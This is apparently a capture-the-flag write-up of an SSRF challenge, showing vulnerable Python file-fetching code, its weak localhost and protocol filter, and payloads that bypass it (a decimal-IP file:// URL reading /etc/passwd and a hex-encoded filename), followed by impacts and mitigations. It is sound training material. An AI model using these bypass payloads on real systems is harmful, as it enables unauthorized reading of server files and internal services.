Featured image of post Windows 12 - DOJO n°33
web

Windows 12 - DOJO n°33

📜 Description

We’ve had the honor of trying out a new computer in the office! Seems we got a nice welcome message when we started the computer, wonder what else there is to find?

~ _The flag can be found in the file: /tmp/secrets/flag.txt

Note: The docker application do not have access to the internet

🕵️ Proof of Concept

The application allows us to open http/https and read its content or read a local file inside /tmp/app/files/ (we cannot use path traversal attack cause of the filename.replace("../",""))

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

if len(filename) > 0:
    while "../" in filename:
        filename = filename.replace("../", "")

    if validate(filename) == True:
        try:
            if re.search(r'^[a-zA-Z]+://', filename):
                content = urlopen(filename, timeout=2).read().decode('utf-8')
            else:
                with open("files/"+filename, 'r') as f:
                    content = f.read()
        except:
            errMsg = "File not found"
    else:
        errMsg = "Access denied"
else:
    with open("files/welcome.txt", 'r') as f:
        content = f.read()

The application blocks file:// protocol :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

def validate(f) -> bool:
    f = f.lower()
    # "file:///" is to dangerous to use:
    if f.startswith("/") or f.startswith("file:///"):
        return False
    # Filter localhost
    elif ("127" in f) or ("localhost" in f):
        return False
    else:
        return True

But we can bypass using decimal IP location : file://2130706433/ = file://127.0.0.1

1

file://2130706433/etc/passwd

The AV block “flag”

But we can encode one letter of flag to hex :

1

file://2130706433/tmp/secrets/fl%61g.txt

Thanks Brumens for this challenge

🚧 Impacts

SSRF attack can have a low to severe impacts on your application by allowing an attacker to :

Perform internal services exploitation and/or reconnaissance. Use your server to make malicious action (like exploiting server in the wild). Leak secret files or variables (like AWS secrets key). …

🔐 Mitigations

Try to avoid this kind of functionnality. If you cannot, use a restricted whitelist on protocol scheme and/or domains (example : ^(http|https)://example.com/[a-zA-Z0-9-/.?&#=]*$. Be aware of filter bypass like https://expected-host@evil-host.

📚 References

PortSwigger - Server-side request forgery (SSRF)